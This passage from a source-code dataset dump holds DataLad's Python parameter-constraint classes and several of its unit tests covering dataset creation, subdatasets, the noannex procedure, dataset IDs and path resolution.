dtype specs, e.g. 'int64'\n # in addition to functors\n def __init__(self, dtype):\n \"\"\"\n Parameters\n ----------\n dtype : functor\n \"\"\"\n self._dtype = dtype\n\n def __call__(self, value):\n if hasattr(value, '__iter__') and \\\n not (isinstance(value, (bytes, str))):\n return list(map(self._dtype, value))\n else:\n return self._dtype(value)\n\n def short_description(self):\n return _type_str(self._dtype)\n\n def long_description(self):\n return \"value must be convertible to type '%s'\" % self.short_description()\n\n\nclass EnsureInt(EnsureDType):\n \"\"\"Ensure that an input (or several inputs) are of a data type 'int'.\n \"\"\"\n def __init__(self):\n \"\"\"Initializes EnsureDType with int\"\"\"\n EnsureDType.__init__(self, int)\n\n\nclass EnsureFloat(EnsureDType):\n \"\"\"Ensure that an input (or several inputs) are of a data type 'float'.\n \"\"\"\n def __init__(self):\n \"\"\"Initializes EnsureDType with float\"\"\"\n EnsureDType.__init__(self, float)\n\n\nclass EnsureListOf(Constraint):\n \"\"\"Ensure that an input is a list of a particular data type\n \"\"\"\n def __init__(self, dtype):\n \"\"\"\n Parameters\n ----------\n dtype : functor\n \"\"\"\n self._dtype = dtype\n super(EnsureListOf, self).__init__()\n\n def __call__(self, value):\n return list(map(self._dtype, ([value] if isinstance(value, str) else value)))\n\n def short_description(self):\n return 'list(%s)' % _type_str(self._dtype)\n\n def long_description(self):\n return \"value must be convertible to %s\" % self.short_description()\n\n\nclass EnsureTupleOf(Constraint):\n \"\"\"Ensure that an input is a tuple of a particular data type\n \"\"\"\n def __init__(self, dtype):\n \"\"\"\n Parameters\n ----------\n dtype : functor\n \"\"\"\n self._dtype = dtype\n super(EnsureTupleOf, self).__init__()\n\n def __call__(self, value):\n return tuple(map(self._dtype, ([value] if isinstance(value, str) else value)))\n\n def short_description(self):\n return 'tuple(%s)' % _type_str(self._dtype)\n\n def long_description(self):\n return \"value must be convertible to %s\" % self.short_description()\n\n\nclass EnsureBool(Constraint):\n \"\"\"Ensure that an input is a bool.\n\n A couple of literal labels are supported, such as:\n False: '0', 'no', 'off', 'disable', 'false'\n True: '1', 'yes', 'on', 'enable', 'true'\n \"\"\"\n def __call__(self, value):\n if isinstance(value, bool):\n return value\n elif isinstance(value, (bytes, str)):\n value = value.lower()\n if value in ('0', 'no', 'off', 'disable', 'false'):\n return False\n elif value in ('1', 'yes', 'on', 'enable', 'true'):\n return True\n raise ValueError(\n \"value '{}' must be convertible to boolean\".format(\n value))\n\n def long_description(self):\n return 'value must be convertible to type bool'\n\n def short_description(self):\n return 'bool'\n\n\nclass EnsureStr(Constraint):\n \"\"\"Ensure an input is a string.\n\n No automatic conversion is attempted.\n \"\"\"\n def __init__(self, min_len=0):\n \"\"\"\n Parameters\n ----------\n min_len: int, optional\n Minimal length for a string.\n \"\"\"\n assert(min_len >= 0)\n self._min_len = min_len\n super(EnsureStr, self).__init__()\n\n def __call__(self, value):\n if not isinstance(value, (bytes, str)):\n # do not perform a blind conversion ala str(), as almost\n # anything can be converted and the result is most likely\n # unintended\n raise ValueError(\"%s is not a string\" % repr(value))\n if len(value) < self._min_len:\n raise ValueError(\"%r is shorter than of minimal length %d\"\n % (value, self._min_len))\n return value\n\n def long_description(self):\n return 'value must be a string'\n\n def short_description(self):\n return 'str'\n\n\nclass EnsureStrPrefix(EnsureStr):\n \"\"\"Ensure an input is a string that starts with a given prefix.\n \"\"\"\n def __init__(self, prefix):\n \"\"\"\n Parameters\n ----------\n prefix : str\n Mandatory prefix.\n \"\"\"\n self._prefix = prefix\n super().__init__()\n\n def __call__(self, value):\n super().__call__(value)\n if not value.startswith(self._prefix):\n raise ValueError(\"%r does not start with '%s'\"\n % (value, self._prefix))\n return value\n\n def long_description(self):\n return \"value must start with '{}'\".format(self._prefix)\n\n def short_description(self):\n return '{}...'.format(self._prefix)\n\n\nclass EnsureNone(Constraint):\n \"\"\"Ensure an input is of value `None`\"\"\"\n def __call__(self, value):\n if value is None or isinstance(value, _NoneDeprecated):\n return None\n else:\n raise ValueError(\"value must be `None`\")\n\n def short_description(self):\n return 'None'\n\n def long_description(self):\n return 'value must be `None`'\n\n\nclass EnsureCallable(Constraint):\n \"\"\"Ensure an input is a callable object\"\"\"\n def __call__(self, value):\n if hasattr(value, '__call__'):\n return value\n else:\n raise ValueError(\"value must be a callable\")\n\n def short_description(self):\n return 'callable'\n\n def long_description(self):\n return 'value must be a callable'\n\n\nclass EnsureChoice(Constraint):\n \"\"\"Ensure an input is element of a set of possible values\"\"\"\n\n def __init__(self, *values):\n \"\"\"\n Parameters\n ----------\n *values\n Possible accepted values.\n \"\"\"\n self._allowed = values\n super(EnsureChoice, self).__init__()\n\n def __call__(self, value):\n if value not in self._allowed:\n raise ValueError(f\"value {value} is not one of {self._allowed}\")\n return value\n\n def long_description(self):\n return 'value must be one of [CMD: %s CMD][PY: %s PY]' % (\n str(tuple(i for i in self._allowed if i is not None)),\n str(self._allowed)\n )\n\n def short_description(self):\n return '{%s}' % ', '.join([repr(c) for c in self._allowed])\n\n\nclass EnsureKeyChoice(EnsureChoice):\n \"\"\"Ensure value under a key in an input is in a set of possible values\"\"\"\n\n def __init__(self, key, values):\n \"\"\"\n Parameters\n ----------\n key : str\n The to-be-tested values are looked up under the given key in\n a dict-like input object.\n values : tuple\n Possible accepted values.\n \"\"\"\n self._key = key\n super(EnsureKeyChoice, self).__init__(*values)\n\n def __call__(self, value):\n if self._key not in value:\n raise ValueError(\"value not dict-like\")\n super(EnsureKeyChoice, self).__call__(value[self._key])\n return value\n\n def long_description(self):\n return \"value in '%s' must be one of %s\" % (self._key, str(self._allowed),)\n\n def short_description(self):\n return '%s:{%s}' % (self._key, ', '.join([str(c) for c in self._allowed]))\n\n\nclass EnsureRange(Constraint):\n \"\"\"Ensure an input is within a particular range\n\n No type checks are performed.\n \"\"\"\n def __init__(self, min=None, max=None):\n \"\"\"\n Parameters\n ----------\n min\n Minimal value to be accepted in the range\n max\n Maximal value to be accepted in the range\n \"\"\"\n self._min = min\n self._max = max\n super(EnsureRange, self).__init__()\n\n def __call__(self, value):\n if self._min is not None:\n if value < self._min:\n raise ValueError(\"value must be at least %s\" % (self._min,))\n if self._max is not None:\n if value > self._max:\n raise ValueError(\"value must be at most %s\" % (self._max,))\n return value\n\n def long_description(self):\n min_str = '-inf' if self._min is None else str(self._min)\n max_str = 'inf' if self._max is None else str(self._max)\n return 'value must be in range [%s, %s]' % (min_str, max_str)\n\n def short_description(self):\n return None\n\n\nclass _MultiConstraint(Constraint):\n \"\"\"Helper class to override the description methods to reported\n multiple constraints\n \"\"\"\n def _get_description(self, attr):\n cs = [\n getattr(c, attr)()\n for c in self.constraints\n if hasattr(c, attr)\n ]\n cs = [c for c in cs if c is not None]\n doc = ' or '.join(cs)\n if len(cs) > 1:\n return f'({doc})'\n else:\n return doc\n\n def long_description(self):\n return self._get_description('long_description')\n\n def short_description(self):\n return self._get_description('short_description')\n\n\nclass AltConstraints(_MultiConstraint):\n \"\"\"Logical OR for constraints.\n\n An arbitrary number of constraints can be given. They are evaluated in the\n order in which they were specified. The value returned by the first\n constraint that does not raise an exception is the global return value.\n\n Documentation is aggregated for all alternative constraints.\n \"\"\"\n def __init__(self, *constraints):\n \"\"\"\n Parameters\n ----------\n *constraints\n Alternative constraints\n \"\"\"\n super(AltConstraints, self).__init__()\n self.constraints = [EnsureNone() if c is None else c for c in constraints]\n\n def __or__(self, other):\n if isinstance(other, AltConstraints):\n self.constraints.extend(other.constraints)\n else:\n self.constraints.append(other)\n return self\n\n def __call__(self, value):\n e_list = []\n for c in self.constraints:\n try:\n return c(value)\n except Exception as e:\n e_list.append(e)\n raise ValueError(f\"{value} does not match any alternative: \"\n f\"{self.constraints} {e_list}\")\n\n\nclass Constraints(_MultiConstraint):\n \"\"\"Logical AND for constraints.\n\n An arbitrary number of constraints can be given. They are evaluated in the\n order in which they were specified. The return value of each constraint is\n passed an input into the next. The return value of the last constraint\n is the global return value. No intermediate exceptions are caught.\n\n Documentation is aggregated for all constraints.\n \"\"\"\n def __init__(self, *constraints):\n \"\"\"\n Parameters\n ----------\n *constraints\n Constraints all of which must be satisfied\n \"\"\"\n super(Constraints, self).__init__()\n self.constraints = [EnsureNone() if c is None else c for c in constraints]\n\n def __and__(self, other):\n if isinstance(other, Constraints):\n self.constraints.extend(other.constraints)\n else:\n self.constraints.append(other)\n return self\n\n def __call__(self, value):\n for c in (self.constraints):\n value = c(value)\n return value\n\n\nconstraint_spec_map = {\n 'float': EnsureFloat(),\n 'int': EnsureInt(),\n 'bool': EnsureBool(),\n 'str': EnsureStr(),\n}\n\n\ndef expand_constraint_spec(spec):\n \"\"\"Helper to translate literal constraint specs into functional ones\n\n e.g. 'float' -> EnsureFloat()\n \"\"\"\n if spec is None or hasattr(spec, '__call__'):\n return spec\n else:\n try:\n return constraint_spec_map[spec]\n except KeyError:\n raise ValueError(\"unsupported constraint specification '%r'\" % (spec,))\n" }, { "alpha_fraction": 0.5809230804443359, "alphanum_fraction": 0.5839999914169312, "avg_line_length": 33.574466705322266, "blob_id": "207019f1d984c3b20db91066bde41303ae8d6fc0", "content_id": "09f14b371c7bdd9517ea49b65ea270f5278f3446", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1625, "license_type": "permissive", "max_line_length": 93, "num_lines": 47, "path": "/datalad/tests/test_installed.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test invocation of datalad utilities \"as is installed\"\n\"\"\"\n\nimport os\nfrom unittest.mock import patch\n\nfrom datalad.cmd import (\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n assert_cwd_unchanged,\n eq_,\n ok_startswith,\n)\n\n\ndef check_run_and_get_output(cmd):\n runner = WitlessRunner()\n try:\n # suppress log output happen it was set to high values\n with patch.dict('os.environ', {'DATALAD_LOG_LEVEL': 'WARN'}):\n output = runner.run(\n [\"datalad\", \"--help\"],\n protocol=StdOutErrCapture)\n except CommandError as e:\n raise AssertionError(\"'datalad --help' failed to start normally. \"\n \"Exited with %d and output %s\" % (e.code, (e.stdout, e.stderr)))\n return output['stdout'], output['stderr']\n\n\n@assert_cwd_unchanged\ndef test_run_datalad_help():\n out, err = check_run_and_get_output(\"datalad --help\")\n ok_startswith(out, \"Usage: \")\n # There could be a warning from coverage that no data was collected, should be benign\n lines = [l for l in err.split(os.linesep) if ('no-data-collected' not in l) and l]\n eq_(lines, [])\n" }, { "alpha_fraction": 0.6395348906517029, "alphanum_fraction": 0.6421775817871094, "avg_line_length": 31.06779670715332, "blob_id": "e3c0782f310cde83972c5dea22686f7f392104f4", "content_id": "f9b11443038da74930d0d2ea52432feba4cf26ed", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "permissive", "max_line_length": 94, "num_lines": 59, "path": "/datalad/resources/procedures/tests/test_noannex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport pytest\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_raises,\n assert_true,\n with_tempfile,\n with_tree,\n)\n\n\ndef check_noannex(ds):\n assert_true(isinstance(ds.repo, GitRepo))\n assert_true((ds.pathobj / \".noannex\").exists())\n assert_false((ds.pathobj / \".git\" / \"annex\").exists())\n\n\n@with_tempfile(mkdir=True)\ndef test_noannex_simple(path=None):\n ds = Dataset(path).create()\n assert_true(isinstance(ds.repo, AnnexRepo))\n ds.run_procedure('cfg_noannex') # we are killing annex while ds.repo\n check_noannex(ds)\n\n\n@with_tree(tree={\n 'data': 'some'\n})\ndef test_noannex_create_force(path=None):\n ds = Dataset(path).create(force=True, cfg_proc='noannex')\n check_noannex(ds)\n\n\[email protected](reason=\"Under pytest gets IncompleteResultsError with CommandError inside \"\n \"instead of actual CommandError\")\n@with_tree(tree={\n 'data': 'some'\n})\ndef test_noannex_fail_if_has_annexed(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n assert_true(isinstance(ds.repo, AnnexRepo))\n # internally procedure raises RuntimeError, but since we run it via runner, we\n # get CommandError here\n with assert_raises(CommandError):\n ds.run_procedure('cfg_noannex') # we are killing annex while ds.repo\n" }, { "alpha_fraction": 0.619040846824646, "alphanum_fraction": 0.6242853999137878, "avg_line_length": 31.967288970947266, "blob_id": "6371bc650e6e2f7fbae68522d71ed43c2633ee3e", "content_id": "63ad84cd7816e7207ba3a3882611f3afb4b550bc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21165, "license_type": "permissive", "max_line_length": 103, "num_lines": 642, "path": "/datalad/distribution/tests/test_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test Dataset class\n\n\"\"\"\n\nimport os\nimport os.path as op\nfrom os.path import abspath\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n relpath,\n)\n\nimport pytest\n\nimport datalad.utils as ut\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n clone,\n create,\n get,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n NoDatasetFound,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_equal,\n assert_false,\n assert_is,\n assert_is_instance,\n assert_is_none,\n assert_is_not,\n assert_is_not_none,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_true,\n eq_,\n known_failure_windows,\n ok_,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n _path_,\n chpwd,\n on_windows,\n rmtree,\n)\n\nfrom ..dataset import (\n Dataset,\n EnsureDataset,\n require_dataset,\n resolve_path,\n)\n\n\ndef test_EnsureDataset():\n\n c = EnsureDataset()\n\n # fails with anything else than a string or a Dataset:\n assert_raises(ValueError, c, 1)\n assert_raises(ValueError, c, ['a', 'list'])\n assert_raises(ValueError, c, (1, 2, 3))\n assert_raises(ValueError, c, {\"what\": \"ever\"})\n\n # let's a Dataset instance pass, but leaves a path untouched\n for test_path in [opj(\"some\", \"path\"), Path(\"some\") / \"path\"]:\n ok_(isinstance(c(test_path), type(test_path)))\n ok_(isinstance(Dataset(test_path), Dataset))\n\n # Note: Ensuring that string is valid path is not\n # part of the constraint itself, so not explicitly tested here.\n\n\n# TODO: test remember/recall more extensive?\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_is_installed(src=None, path=None):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(src).create(**ca)\n _ = origds.create('subm 1', **ca)\n\n ds = Dataset(path)\n assert_false(ds.is_installed())\n\n # get a clone:\n clone(src, path, **ca)\n ok_(ds.is_installed())\n # submodule still not installed:\n subds = Dataset(ds.pathobj / 'subm 1')\n assert_false(subds.is_installed())\n # We must not be able to create a new repository under a known\n # subdataset path.\n # Note: Unfortunately we would still be able to generate it under\n # subdirectory within submodule, e.g. `subm 1/subdir` but that is\n # not checked here. `create` provides that protection though.\n res = subds.create(on_failure='ignore',\n return_type='list',\n result_filter=None,\n result_xfm=None,\n **ca)\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, status='error', path=subds.path,\n message=('collision with %s (dataset) in dataset %s',\n subds.path, ds.path))\n # get the submodule\n with chpwd(ds.path):\n get('subm 1', **ca)\n ok_(subds.is_installed())\n # wipe it out\n rmtree(ds.path)\n assert_false(ds.is_installed())\n\n\n@with_tempfile(mkdir=True)\ndef test_dataset_constructor(path=None):\n # dataset needs a path\n assert_raises(TypeError, Dataset)\n assert_raises(ValueError, Dataset, None)\n with chpwd(path):\n assert_raises(NoDatasetFound, Dataset, '^.')\n assert_raises(NoDatasetFound, Dataset, '^')\n dsabs = Dataset(path)\n # always abspath\n ok_(os.path.isabs(dsabs.path))\n eq_(path, dsabs.path)\n # no repo\n eq_(dsabs.repo, None)\n # same result when executed in that path and using relative paths\n with chpwd(path):\n dsrel = Dataset('.')\n eq_(dsrel.path, dsabs.path)\n # no repo either, despite directory existing now\n eq_(dsrel.repo, None)\n\n\n@with_tempfile(mkdir=True)\ndef test_repo_cache(path=None):\n ds = Dataset(path)\n # none by default\n eq_(ds.repo, None)\n # make Git repo manually\n git = GitRepo(path=path, create=True)\n repo = ds.repo\n # got one\n assert_false(repo is None)\n # stays that one\n assert_true(ds.repo is repo)\n # now turn into an annex\n annex = AnnexRepo(path=path, create=True)\n # repo instance must change\n assert_false(ds.repo is repo)\n assert_true(isinstance(ds.repo, AnnexRepo))\n\n\n@with_tempfile(mkdir=True)\ndef test_subdatasets(path=None):\n # from scratch\n ds = Dataset(path)\n assert_false(ds.is_installed())\n assert_raises(ValueError, ds.subdatasets)\n ds = ds.create()\n assert_true(ds.is_installed())\n eq_(ds.subdatasets(), [])\n # create some file and commit it\n open(os.path.join(ds.path, 'test'), 'w').write('some')\n ds.save(path='test', message=\"Hello!\", version_tag=1)\n assert_true(ds.is_installed())\n # Assuming that tmp location was not under a super-dataset\n eq_(ds.get_superdataset(), None)\n eq_(ds.get_superdataset(topmost=True), ds)\n\n # add itself as a subdataset (crazy, isn't it?)\n subds = ds.install('subds', source=path,\n result_xfm='datasets', return_type='item-or-list')\n assert_true(subds.is_installed())\n eq_(subds.get_superdataset(), ds)\n eq_(subds.get_superdataset(topmost=True), ds)\n\n subdss = ds.subdatasets()\n eq_(len(subdss), 1)\n eq_(subds.path, ds.subdatasets(result_xfm='paths')[0])\n eq_(subdss, ds.subdatasets(recursive=True))\n eq_(subdss, ds.subdatasets(state='present'))\n ds.save(message=\"with subds\", version_tag=2)\n ds.recall_state(1)\n assert_true(ds.is_installed())\n eq_(ds.subdatasets(), [])\n\n # very nested subdataset to test topmost\n subsubds = subds.install(\n _path_('d1/subds'), source=path,\n result_xfm='datasets', return_type='item-or-list')\n assert_true(subsubds.is_installed())\n eq_(subsubds.get_superdataset(), subds)\n # by default, it will only report a subperdataset that actually\n # has the queries dataset as a registered true subdataset\n eq_(subsubds.get_superdataset(topmost=True), subds)\n # by we can also ask for a dataset that is merely above\n eq_(subsubds.get_superdataset(topmost=True, registered_only=False), ds)\n\n # verify that '^' alias would work\n with chpwd(subsubds.path):\n dstop = Dataset('^')\n eq_(dstop, subds)\n # and while in the dataset we still can resolve into central one\n dscentral = Dataset('///')\n eq_(dscentral.path,\n dl_cfg.obtain('datalad.locations.default-dataset'))\n\n with chpwd(ds.path):\n dstop = Dataset('^')\n eq_(dstop, ds)\n\n # TODO actual submodule checkout is still there\n\n # Test ^. (the dataset for curdir) shortcut\n # At the top should point to the top\n with chpwd(ds.path):\n dstop = Dataset('^.')\n eq_(dstop, ds)\n\n # and still does within subdir\n os.mkdir(opj(ds.path, 'subdir'))\n with chpwd(opj(ds.path, 'subdir')):\n dstop = Dataset('^.')\n eq_(dstop, ds)\n\n # within submodule will point to submodule\n with chpwd(subsubds.path):\n dstop = Dataset('^.')\n eq_(dstop, subsubds)\n\n\n@with_tempfile(mkdir=True)\ndef test_hat_dataset_more(path=None):\n # from scratch\n ds = Dataset(path).create()\n # add itself as a subdataset (crazy, isn't it?)\n subds = ds.install(\n 'subds', source=path,\n result_xfm='datasets', return_type='item-or-list')\n # must find its way all the way up from an untracked dir in a subsubds\n untracked_subdir = op.join(subds.path, 'subdir')\n os.makedirs(untracked_subdir)\n with chpwd(untracked_subdir):\n eq_(Dataset('^'), ds)\n\n\[email protected](\"ds_path\", [\"simple-path\", OBSCURE_FILENAME])\n@with_tempfile(mkdir=True)\ndef test_require_dataset(topdir=None, *, ds_path):\n path = opj(topdir, ds_path)\n os.mkdir(path)\n with chpwd(path):\n assert_raises(\n NoDatasetFound,\n require_dataset,\n None)\n create('.')\n # in this folder by default\n assert_equal(\n require_dataset(None).path,\n path)\n\n assert_equal(\n require_dataset('some', check_installed=False).path,\n abspath('some'))\n assert_raises(\n NoDatasetFound,\n require_dataset,\n 'some',\n check_installed=True)\n\n\n@with_tempfile(mkdir=True)\ndef test_dataset_id(path=None):\n\n ds = Dataset(path)\n assert_equal(ds.id, None)\n ds.create()\n dsorigid = ds.id\n # ID is always a UUID\n assert_equal(ds.id.count('-'), 4)\n assert_equal(len(ds.id), 36)\n\n # Ben: The following part of the test is concerned with creating new objects\n # and therefore used to reset the flyweight dict while keeping a ref to\n # the old object for comparison etc. This is ugly and in parts\n # retesting what is already tested in `test_Dataset_flyweight`. No need\n # for that. If we del the last ref to an instance and gc.collect(),\n # then we get a new instance on next request. This test should trust\n # the result of `test_Dataset_flyweight`.\n\n # creating a new object for the same path\n # yields the same ID\n del ds\n newds = Dataset(path)\n assert_equal(dsorigid, newds.id)\n\n # recreating the dataset does NOT change the id\n del newds\n\n ds = Dataset(path)\n ds.create(annex=False, force=True)\n assert_equal(ds.id, dsorigid)\n\n # even adding an annex doesn't\n del ds\n ds = Dataset(path)\n ds.create(force=True)\n assert_equal(ds.id, dsorigid)\n\n # dataset ID and annex UUID have nothing to do with each other\n # if an ID was already generated\n assert_true(ds.repo.uuid != ds.id)\n\n # even if we generate a dataset from scratch with an annex UUID right away,\n # this is also not the ID\n annexds = Dataset(opj(path, 'scratch')).create()\n assert_true(annexds.id != annexds.repo.uuid)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_Dataset_flyweight(path1=None, path2=None):\n\n import gc\n import sys\n\n ds1 = Dataset(path1)\n assert_is_instance(ds1, Dataset)\n # Don't create circular references or anything similar\n assert_equal(1, sys.getrefcount(ds1) - 1)\n\n ds1.create()\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # refcount still fine after repo creation:\n assert_equal(1, sys.getrefcount(ds1) - 1)\n\n\n # instantiate again:\n ds2 = Dataset(path1)\n assert_is_instance(ds2, Dataset)\n # the very same object:\n ok_(ds1 is ds2)\n\n # reference the same via relative path:\n with chpwd(path1):\n ds3 = Dataset(relpath(path1, start=path2))\n ok_(ds1 == ds3)\n ok_(ds1 is ds3)\n\n # gc knows one such object only:\n eq_(1, len([o for o in gc.get_objects()\n if isinstance(o, Dataset) and o.path == path1]))\n\n\n # on windows a symlink is not what you think it is\n if not on_windows:\n # reference the same via symlink:\n with chpwd(path2):\n os.symlink(path1, 'linked')\n ds4 = Dataset('linked')\n ds4_id = id(ds4)\n ok_(ds4 == ds1)\n ok_(ds4 is not ds1)\n\n # underlying repo, however, IS the same:\n ok_(ds4.repo is ds1.repo)\n\n # deleting one reference has no effect on the other:\n del ds1\n gc.collect() # TODO: see first comment above\n ok_(ds2 is not None)\n ok_(ds2.repo is ds3.repo)\n if not on_windows:\n ok_(ds2.repo is ds4.repo)\n\n # deleting remaining references should lead to garbage collection\n del ds2\n\n with swallow_logs(new_level=1) as cml:\n del ds3\n gc.collect() # TODO: see first comment above\n # flyweight vanished:\n assert_not_in(path1, Dataset._unique_instances.keys())\n # no such instance known to gc anymore:\n eq_([], [o for o in gc.get_objects()\n if isinstance(o, Dataset) and o.path == path1])\n # underlying repo should only be cleaned up, if ds3 was the last\n # reference to it. Otherwise the repo instance should live on\n # (via symlinked ds4):\n finalizer_log = \"Finalizer called on: AnnexRepo(%s)\" % path1\n if on_windows:\n cml.assert_logged(msg=finalizer_log,\n level=\"Level 1\",\n regex=False)\n else:\n assert_not_in(finalizer_log, cml.out)\n # symlinked is still there:\n ok_(ds4 is not None)\n eq_(ds4_id, id(ds4))\n\n\n@with_tempfile\ndef test_property_reevaluation(repo1=None):\n ds = Dataset(repo1)\n assert_is_none(ds.repo)\n assert_is_not_none(ds.config)\n first_config = ds.config\n assert_false(ds._cfg_bound)\n assert_is_none(ds.id)\n\n ds.create()\n assert_repo_status(repo1)\n # after creation, we have `repo`, and `config` was reevaluated to point\n # to the repo's config:\n assert_is_not_none(ds.repo)\n assert_is_not_none(ds.config)\n second_config = ds.config\n assert_true(ds._cfg_bound)\n assert_is(ds.config, ds.repo.config)\n assert_is_not(first_config, second_config)\n assert_is_not_none(ds.id)\n first_id = ds.id\n\n ds.drop(what='all', reckless='kill', recursive=True)\n # repo is gone, and config is again reevaluated to only provide user/system\n # level config:\n assert_false(lexists(ds.path))\n assert_is_none(ds.repo)\n assert_is_not_none(ds.config)\n third_config = ds.config\n assert_false(ds._cfg_bound)\n assert_is_not(second_config, third_config)\n assert_is_none(ds.id)\n\n ds.create()\n assert_repo_status(repo1)\n # after recreation everything is sane again:\n assert_is_not_none(ds.repo)\n assert_is_not_none(ds.config)\n assert_is(ds.config, ds.repo.config)\n forth_config = ds.config\n assert_true(ds._cfg_bound)\n assert_is_not(third_config, forth_config)\n assert_is_not_none(ds.id)\n assert_not_equal(ds.id, first_id)\n\n\n# While os.symlink does work on windows (since vista), os.path.realpath\n# doesn't resolve such symlinks. This has all kinds of implications.\n# Hopefully this can be dealt with, when we switch to using pathlib\n# (see datalad-revolution).\n@known_failure_windows\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_symlinked_dataset_properties(repo1=None, repo2=None, repo3=None, non_repo=None, symlink=None):\n\n ds = Dataset(repo1).create()\n\n # now, let ds be a symlink and change that symlink to point to different\n # things:\n ar2 = AnnexRepo(repo2)\n ar3 = AnnexRepo(repo3)\n assert_true(os.path.isabs(non_repo))\n\n os.symlink(repo1, symlink)\n ds_link = Dataset(symlink)\n assert_is(ds_link.repo, ds.repo) # same Repo instance\n assert_is_not(ds_link, ds) # but not the same Dataset instance\n assert_is(ds_link.config, ds.repo.config)\n assert_true(ds_link._cfg_bound)\n assert_is_not_none(ds_link.id)\n # same id, although different Dataset instance:\n assert_equal(ds_link.id, ds.id)\n\n os.unlink(symlink)\n os.symlink(repo2, symlink)\n\n assert_is(ds_link.repo, ar2) # same Repo instance\n assert_is(ds_link.config, ar2.config)\n assert_true(ds_link._cfg_bound)\n # id is None again, since this repository is an annex but there was no\n # Dataset.create() called yet.\n assert_is_none(ds_link.id)\n\n os.unlink(symlink)\n os.symlink(repo3, symlink)\n\n assert_is(ds_link.repo, ar3) # same Repo instance\n assert_is(ds_link.config, ar3.config)\n assert_true(ds_link._cfg_bound)\n # id is None again, since this repository is an annex but there was no\n # Dataset.create() called yet.\n assert_is_none(ds_link.id)\n\n os.unlink(symlink)\n os.symlink(non_repo, symlink)\n\n assert_is_none(ds_link.repo)\n assert_is_not(ds_link.config, ar3.config)\n assert_false(ds_link._cfg_bound)\n assert_is_none(ds_link.id)\n\n\n@with_tempfile(mkdir=True)\ndef test_resolve_path(path=None):\n if str(Path(path).resolve()) != path:\n raise SkipTest(\"Test assumptions require non-symlinked parent paths\")\n # initially ran into on OSX https://github.com/datalad/datalad/issues/2406\n opath = op.join(path, \"origin\")\n os.makedirs(opath)\n if not on_windows:\n lpath = op.join(path, \"linked\")\n os.symlink('origin', lpath)\n\n ds_global = Dataset(path)\n # path resolution of absolute paths is not influenced by symlinks\n # ignore the linked path on windows, it is not a symlink in the POSIX sense\n for d in (opath,) if on_windows else (opath, lpath):\n ds_local = Dataset(d)\n # no symlink resolution\n eq_(str(resolve_path(d)), d)\n # list comes out as a list\n eq_(resolve_path([d]), [Path(d)])\n # multiple OK\n eq_(resolve_path([d, d]), [Path(d), Path(d)])\n\n with chpwd(d):\n # be aware: knows about cwd, but this CWD has symlinks resolved\n eq_(str(resolve_path(d).cwd()), opath)\n # using pathlib's `resolve()` will resolve any\n # symlinks\n # also resolve `opath`, as on old windows systems the path might\n # come in crippled (e.g. C:\\Users\\MIKE~1/...)\n # and comparison would fails unjustified\n eq_(resolve_path('.').resolve(), ut.Path(opath).resolve())\n # no norming, but absolute paths, without resolving links\n eq_(resolve_path('.'), ut.Path(d))\n eq_(str(resolve_path('.')), d)\n\n # there is no concept of an \"explicit\" relative path anymore\n # relative is relative, regardless of the specific syntax\n eq_(resolve_path(op.join(os.curdir, 'bu'), ds=ds_global),\n ds_global.pathobj / 'bu')\n # there is no full normpath-ing or other funky resolution of\n # parent directory back-reference\n eq_(str(resolve_path(op.join(os.pardir, 'bu'), 